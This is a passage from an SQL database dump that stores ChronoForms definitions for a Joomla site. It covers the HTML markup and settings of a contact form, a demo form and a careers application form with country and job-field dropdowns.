CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_button\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLvalue = SendCHRONO_CONSTANT_EOLname = button_12CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLreset = 0CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 0CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',1,'','','','',''),(7,'ContactUs','\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Your Name:</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_17\" name=\"text_17\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Phone:</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_16\" name=\"text_16\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">E-mail:</label>\r\n <input class=\"cf_inputbox required validate-email\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_15\" name=\"text_15\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textarea\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Message:</label>\r\n <textarea class=\"cf_inputbox required\" rows=\"3\" id=\"text_13\" title=\"\" cols=\"30\" name=\"text_13\"></textarea>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_button\">\r\n <input value=\"Send\" name=\"button_5\" type=\"submit\" />\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',2,'text_17,text_16,text_15,text_13','text,text,text,textarea','<p><span style=\"color: #140b0c; font-family: Arial; font-weight: bold; line-height: normal;\">Thank You for Sending Your Request, We will Contact You As Soon As Possible.</span></p>','','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=No\nsavedataorder=after_email\ndvfields=\ndvrecord=Record #n\nuploads=Yes\nuploadfields=\nuploadpath=/home/jepaorg/public_html/components/com_chronocontact/uploads/FreeTrial/\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=','','','','','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_17CHRONO_CONSTANT_EOLname = text_17CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Your Name:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_16CHRONO_CONSTANT_EOLname = text_16CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Phone:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_15CHRONO_CONSTANT_EOLname = text_15CHRONO_CONSTANT_EOLclass = cf_inputbox required validate-emailCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = E-mail:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textarea\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_13CHRONO_CONSTANT_EOLname = text_13CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLrows = 3CHRONO_CONSTANT_EOLcols = 30CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Message:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_button\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLvalue = SendCHRONO_CONSTANT_EOLname = button_5CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLreset = 0CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 0CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',1,'','','','',''),(8,'basicDemo','<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Name</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"Please enter your name\" id=\"text_1\" name=\"name\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Email address:</label>\r\n <input class=\"cf_inputbox required validate-email\" maxlength=\"150\" size=\"30\" title=\"Please enter your email address\" id=\"text_2\" name=\"email\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Subject</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"Please enter a subject for your message\" id=\"text_3\" name=\"subject\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textarea\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Message</label>\r\n <textarea class=\"cf_inputbox required\" rows=\"5\" id=\"text_4\" title=\"Please enter your message\" cols=\"40\" name=\"message\"></textarea>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_button\">\r\n <input value=\"Submit\" name=\"button_5\" type=\"submit\" />\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',2,'name,email,subject,message','text,text,text,textarea','<p>Thank you for contacting us at Mywebsite.com, we have received your message and we will get back to you ASAP!</p>\r\n<p><span style=\"color: #ff0000;\">Hey admin, you need to configure the emaisl addresses in the admin area for the real form to be sent to</span> <strong>YOU</strong></p>','','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=No\nsavedataorder=after_email\ndvfields=\ndvrecord=Record #n\nuploads=No\nuploadfields=\nuploadpath=C:\\xampp\\htdocs\\xampp\\chronosim2\\components\\com_chronocontact\\uploads\\basicDemo\\\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=','','','','','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_1CHRONO_CONSTANT_EOLname = nameCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter your nameCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = NameCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_2CHRONO_CONSTANT_EOLname = emailCHRONO_CONSTANT_EOLclass = cf_inputbox required validate-emailCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter your email addressCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Email address:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_3CHRONO_CONSTANT_EOLname = subjectCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter a subject for your messageCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = SubjectCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textarea\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_4CHRONO_CONSTANT_EOLname = messageCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLrows = 5CHRONO_CONSTANT_EOLcols = 40CHRONO_CONSTANT_EOLtitle = Please enter your messageCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = MessageCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_button\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLvalue = SubmitCHRONO_CONSTANT_EOLname = button_5CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLreset = 0CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 0CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',1,'','','','',''),(9,'Careers_at_FIT','\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Full Name *</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"300\" size=\"30\" title=\"\" id=\"text_2\" name=\"fullname\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textarea\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Address</label>\r\n <textarea class=\"cf_inputbox\" rows=\"3\" id=\"text_3\" title=\"\" cols=\"30\" name=\"Address\"></textarea>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">City *</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_6\" name=\"city\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Zip Code</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_5\" name=\"zipcode\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_dropdown\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Country *</label>\r\n <select class=\"cf_inputbox validate-selection\" id=\"select_8\" size=\"1\" title=\"\" name=\"country\">\r\n <option value=\"\">Country *</option>\r\n <option value=\"Afghanistan\">Afghanistan</option>\n<option value=\"Åland Islands\">Åland Islands</option>\n<option value=\"Albania\">Albania</option>\n<option value=\"Algeria\">Algeria</option>\n<option value=\"American Samoa\">American Samoa</option>\n<option value=\"Andorra\">Andorra</option>\n<option value=\"Angola\">Angola</option>\n<option value=\"Anguilla\">Anguilla</option>\n<option value=\"Antarctica\">Antarctica</option>\n<option value=\"Antigua and Barbuda\">Antigua and Barbuda</option>\n<option value=\"Argentina\">Argentina</option>\n<option value=\"Armenia\">Armenia</option>\n<option value=\"Aruba\">Aruba</option>\n<option value=\"Australia\">Australia</option>\n<option value=\"Austria\">Austria</option>\n<option value=\"Azerbaijan\">Azerbaijan</option>\n<option value=\"Bahamas\">Bahamas</option>\n<option value=\"Bahrain\">Bahrain</option>\n<option value=\"Bangladesh\">Bangladesh</option>\n<option value=\"Barbados\">Barbados</option>\n<option value=\"Belarus\">Belarus</option>\n<option value=\"Belgium\">Belgium</option>\n<option value=\"Belize\">Belize</option>\n<option value=\"Benin\">Benin</option>\n<option value=\"Bermuda\">Bermuda</option>\n<option value=\"Bhutan\">Bhutan</option>\n<option value=\"Bolivia\">Bolivia</option>\n<option value=\"Bonaire\">Bonaire</option>\n<option value=\"Bosnia and Herzegovina\">Bosnia and Herzegovina</option>\n<option value=\"Botswana\">Botswana</option>\n<option value=\"Bouvet Island\">Bouvet Island</option>\n<option value=\"Brazil\">Brazil</option>\n<option value=\"British Indian Ocean Territory\">British Indian Ocean Territory</option>\n<option value=\"Brunei\">Brunei</option>\n<option value=\"Bulgaria\">Bulgaria</option>\n<option value=\"Burkina Faso\">Burkina Faso</option>\n<option value=\"Burundi\">Burundi</option>\n<option value=\"Cambodia\">Cambodia</option>\n<option value=\"Cameroon\">Cameroon</option>\n<option value=\"Canada\">Canada</option>\n<option value=\"Cape Verde\">Cape Verde</option>\n<option value=\"Cayman Islands\">Cayman Islands</option>\n<option value=\"Central African Republic\">Central African Republic</option>\n<option value=\"Chad\">Chad</option>\n<option value=\"Chile\">Chile</option>\n<option value=\"China\">China</option>\n<option value=\"Christmas Island\">Christmas Island</option>\n<option value=\"Cocos (Keeling) Islands\">Cocos (Keeling) Islands</option>\n<option value=\"Colombia\">Colombia</option>\n<option value=\"Comoros\">Comoros</option>\n<option value=\"Congo\">Congo</option>\n<option value=\"Congo (DRC)\">Congo (DRC)</option>\n<option value=\"Cook Islands\">Cook Islands</option>\n<option value=\"Costa Rica\">Costa Rica</option>\n<option value=\"Croatia\">Croatia</option>\n<option value=\"Cuba\">Cuba</option>\n<option value=\"Curaçao\">Curaçao</option>\n<option value=\"Cyprus\">Cyprus</option>\n<option value=\"Czech Republic\">Czech Republic</option>\n<option value=\"Denmark\">Denmark</option>\n<option value=\"Djibouti\">Djibouti</option>\n<option value=\"Dominica\">Dominica</option>\n<option value=\"Dominican Republic\">Dominican Republic</option>\n<option value=\"Ecuador\">Ecuador</option>\n<option value=\"Egypt\">Egypt</option>\n<option value=\"El Salvador\">El Salvador</option>\n<option value=\"Equatorial Guinea\">Equatorial Guinea</option>\n<option value=\"Eritrea\">Eritrea</option>\n<option value=\"Estonia\">Estonia</option>\n<option value=\"Ethiopia\">Ethiopia</option>\n<option value=\"Falkland Islands (Islas Malvinas)\">Falkland Islands (Islas Malvinas)</option>\n<option value=\"Faroe Islands\">Faroe Islands</option>\n<option value=\"Fiji Islands\">Fiji Islands</option>\n<option value=\"Finland\">Finland</option>\n<option value=\"France\">France</option>\n<option value=\"French Guiana\">French Guiana</option>\n<option value=\"French Polynesia\">French Polynesia</option>\n<option value=\"French Southern and Antarctic Lands\">French Southern and Antarctic Lands</option>\n<option value=\"Gabon\">Gabon</option>\n<option value=\"Gambia, The\">Gambia, The</option>\n<option value=\"Georgia\">Georgia</option>\n<option value=\"Germany\">Germany</option>\n<option value=\"Ghana\">Ghana</option>\n<option value=\"Gibraltar\">Gibraltar</option>\n<option value=\"Greece\">Greece</option>\n<option value=\"Greenland\">Greenland</option>\n<option value=\"Grenada\">Grenada</option>\n<option value=\"Guadeloupe\">Guadeloupe</option>\n<option value=\"Guam\">Guam</option>\n<option value=\"Guatemala\">Guatemala</option>\n<option value=\"Guernsey\">Guernsey</option>\n<option value=\"Guinea\">Guinea</option>\n<option value=\"Guinea-Bissau\">Guinea-Bissau</option>\n<option value=\"Guyana\">Guyana</option>\n<option value=\"Haiti\">Haiti</option>\n<option value=\"Heard Island and McDonald Islands\">Heard Island and McDonald Islands</option>\n<option value=\"Honduras\">Honduras</option>\n<option value=\"Hong Kong SAR\">Hong Kong SAR</option>\n<option value=\"Hungary\">Hungary</option>\n<option value=\"Iceland\">Iceland</option>\n<option value=\"India\">India</option>\n<option value=\"Indonesia\">Indonesia</option>\n<option value=\"Iran\">Iran</option>\n<option value=\"Iraq\">Iraq</option>\n<option value=\"Ireland\">Ireland</option>\n<option value=\"Isle of Man\">Isle of Man</option>\n<option value=\"Israel\">Israel</option>\n<option value=\"Italy\">Italy</option>\n<option value=\"Jamaica\">Jamaica</option>\n<option value=\"Jan Mayen\">Jan Mayen</option>\n<option value=\"Japan\">Japan</option>\n<option value=\"Jersey\">Jersey</option>\n<option value=\"Jordan\">Jordan</option>\n<option value=\"Kazakhstan\">Kazakhstan</option>\n<option value=\"Kenya\">Kenya</option>\n<option value=\"Kiribati\">Kiribati</option>\n<option value=\"Korea\">Korea</option>\n<option value=\"Kuwait\">Kuwait</option>\n<option value=\"Kyrgyzstan\">Kyrgyzstan</option>\n<option value=\"Laos\">Laos</option>\n<option value=\"Latvia\">Latvia</option>\n<option value=\"Lebanon\">Lebanon</option>\n<option value=\"Lesotho\">Lesotho</option>\n<option value=\"Liberia\">Liberia</option>\n<option value=\"Libya\">Libya</option>\n<option value=\"Liechtenstein\">Liechtenstein</option>\n<option value=\"Lithuania\">Lithuania</option>\n<option value=\"Luxembourg\">Luxembourg</option>\n<option value=\"Macao SAR\">Macao SAR</option>\n<option value=\"Macedonia, Former Yugoslav Republic of\">Macedonia, Former Yugoslav Republic of</option>\n<option value=\"Madagascar\">Madagascar</option>\n<option value=\"Malawi\">Malawi</option>\n<option value=\"Malaysia\">Malaysia</option>\n<option value=\"Maldives\">Maldives</option>\n<option value=\"Mali\">Mali</option>\n<option value=\"Malta\">Malta</option>\n<option value=\"Marshall Islands\">Marshall Islands</option>\n<option value=\"Martinique\">Martinique</option>\n<option value=\"Mauritania\">Mauritania</option>\n<option value=\"Mauritius\">Mauritius</option>\n<option value=\"Mayotte\">Mayotte</option>\n<option value=\"Mexico\">Mexico</option>\n<option value=\"Micronesia\">Micronesia</option>\n<option value=\"Moldova\">Moldova</option>\n<option value=\"Monaco\">Monaco</option>\n<option value=\"Mongolia\">Mongolia</option>\n<option value=\"Montenegro\">Montenegro</option>\n<option value=\"Montserrat\">Montserrat</option>\n<option value=\"Morocco\">Morocco</option>\n<option value=\"Mozambique\">Mozambique</option>\n<option value=\"Myanmar\">Myanmar</option>\n<option value=\"Namibia\">Namibia</option>\n<option value=\"Nauru\">Nauru</option>\n<option value=\"Nepal\">Nepal</option>\n<option value=\"Netherlands\">Netherlands</option>\n<option value=\"New Caledonia\">New Caledonia</option>\n<option value=\"New Zealand\">New Zealand</option>\n<option value=\"Nicaragua\">Nicaragua</option>\n<option value=\"Niger\">Niger</option>\n<option value=\"Nigeria\">Nigeria</option>\n<option value=\"Niue\">Niue</option>\n<option value=\"Norfolk Island\">Norfolk Island</option>\n<option value=\"North Korea\">North Korea</option>\n<option value=\"Northern Mariana Islands\">Northern Mariana Islands</option>\n<option value=\"Norway\">Norway</option>\n<option value=\"Oman\">Oman</option>\n<option value=\"Pakistan\">Pakistan</option>\n<option value=\"Palau\">Palau</option>\n<option value=\"Palestinian Authority\">Palestinian Authority</option>\n<option value=\"Panama\">Panama</option>\n<option value=\"Papua New Guinea\">Papua New Guinea</option>\n<option value=\"Paraguay\">Paraguay</option>\n<option value=\"Peru\">Peru</option>\n<option value=\"Philippines\">Philippines</option>\n<option value=\"Pitcairn Islands\">Pitcairn Islands</option>\n<option value=\"Poland\">Poland</option>\n<option value=\"Portugal\">Portugal</option>\n<option value=\"Puerto Rico\">Puerto Rico</option>\n<option value=\"Qatar\">Qatar</option>\n<option value=\"Republic of Côte d\'Ivoire\">Republic of Côte d\'Ivoire</option>\n<option value=\"Reunion\">Reunion</option>\n<option value=\"Romania\">Romania</option>\n<option value=\"Russia\">Russia</option>\n<option value=\"Rwanda\">Rwanda</option>\n<option value=\"Saba\">Saba</option>\n<option value=\"Samoa\">Samoa</option>\n<option value=\"San Marino\">San Marino</option>\n<option value=\"São Tomé and Príncipe\">São Tomé and Príncipe</option>\n<option value=\"Saudi Arabia\">Saudi Arabia</option>\n<option value=\"Senegal\">Senegal</option>\n<option value=\"Serbia\">Serbia</option>\n<option value=\"Seychelles\">Seychelles</option>\n<option value=\"Sierra Leone\">Sierra Leone</option>\n<option value=\"Singapore\">Singapore</option>\n<option value=\"Sint Eustatius\">Sint Eustatius</option>\n<option value=\"Sint Maarten\">Sint Maarten</option>\n<option value=\"Slovakia\">Slovakia</option>\n<option value=\"Slovenia\">Slovenia</option>\n<option value=\"Solomon Islands\">Solomon Islands</option>\n<option value=\"Somalia\">Somalia</option>\n<option value=\"South Africa\">South Africa</option>\n<option value=\"South Georgia and the South Sandwich Islands\">South Georgia and the South Sandwich Islands</option>\n<option value=\"Spain\">Spain</option>\n<option value=\"Sri Lanka\">Sri Lanka</option>\n<option value=\"St. Barthélemy\">St. Barthélemy</option>\n<option value=\"St. Helena\">St. Helena</option>\n<option value=\"St. Kitts and Nevis\">St. Kitts and Nevis</option>\n<option value=\"St. Lucia\">St. Lucia</option>\n<option value=\"St. Martin\">St. Martin</option>\n<option value=\"St. Pierre and Miquelon\">St. Pierre and Miquelon</option>\n<option value=\"St. Vincent and the Grenadines\">St. Vincent and the Grenadines</option>\n<option value=\"Sudan\">Sudan</option>\n<option value=\"Suriname\">Suriname</option>\n<option value=\"Swaziland\">Swaziland</option>\n<option value=\"Sweden\">Sweden</option>\n<option value=\"Switzerland\">Switzerland</option>\n<option value=\"Syria\">Syria</option>\n<option value=\"Taiwan\">Taiwan</option>\n<option value=\"Tajikistan\">Tajikistan</option>\n<option value=\"Tanzania\">Tanzania</option>\n<option value=\"Thailand\">Thailand</option>\n<option value=\"Timor-Leste\">Timor-Leste</option>\n<option value=\"Togo\">Togo</option>\n<option value=\"Tokelau\">Tokelau</option>\n<option value=\"Tonga\">Tonga</option>\n<option value=\"Trinidad and Tobago\">Trinidad and Tobago</option>\n<option value=\"Tunisia\">Tunisia</option>\n<option value=\"Turkey\">Turkey</option>\n<option value=\"Turkmenistan\">Turkmenistan</option>\n<option value=\"Turks and Caicos Islands\">Turks and Caicos Islands</option>\n<option value=\"Tuvalu\">Tuvalu</option>\n<option value=\"Uganda\">Uganda</option>\n<option value=\"Ukraine\">Ukraine</option>\n<option value=\"United Arab Emirates\">United Arab Emirates</option>\n<option value=\"United Kingdom\">United Kingdom</option>\n<option value=\"United States\">United States</option>\n<option value=\"United States Minor Outlying Islands\">United States Minor Outlying Islands</option>\n<option value=\"Uruguay\">Uruguay</option>\n<option value=\"Uzbekistan\">Uzbekistan</option>\n<option value=\"Vanuatu\">Vanuatu</option>\n<option value=\"Vatican City\">Vatican City</option>\n<option value=\"Venezuela\">Venezuela</option>\n<option value=\"Vietnam\">Vietnam</option>\n<option value=\"Virgin Islands, British\">Virgin Islands, British</option>\n<option value=\"Virgin Islands, U.S.\">Virgin Islands, U.S.</option>\n<option value=\"Wallis and Futuna\">Wallis and Futuna</option>\n<option value=\"Yemen\">Yemen</option>\n<option value=\"Zambia\">Zambia</option>\n<option value=\"Zimbabwe\">Zimbabwe</option>\n\r\n </select>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Telephone</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_11\" name=\"telephone\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Cell *</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_12\" name=\"cell\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Email *</label>\r\n <input class=\"cf_inputbox required validate-email\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_13\" name=\"email\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">URL (if any)</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_9\" name=\"url\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_dropdown\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Applied For *</label>\r\n <select class=\"cf_inputbox\" id=\"select_15\" size=\"1\" title=\"\" name=\"select_15\">\r\n <option value=\"\">Applied For *</option>\r\n <option value=\"Software Project Manager\">Software Project Manager</option>\n<option value=\"Accounting/Auditing\">Accounting/Auditing</option>\n<option value=\"Administration\">Administration</option>\n<option value=\"Advertising\">Advertising</option>\n<option value=\"Agriculture/Forestry/Fishing\">Agriculture/Forestry/Fishing</option>\n<option value=\"Airlines/Aviation\">Airlines/Aviation</option>\n<option value=\"Architecture\">Architecture</option>\n<option value=\"Arts/Entertainment/and Media\">Arts/Entertainment/and Media</option>\n<option value=\"Automotive\">Automotive</option>\n<option value=\"Aviation/Marine Refueling\">Aviation/Marine Refueling</option>\n<option value=\"Banking\">Banking</option>\n<option value=\"Biotechnology\">Biotechnology</option>\n<option value=\"Business Support\">Business Support</option>\n<option value=\"Catering/Food 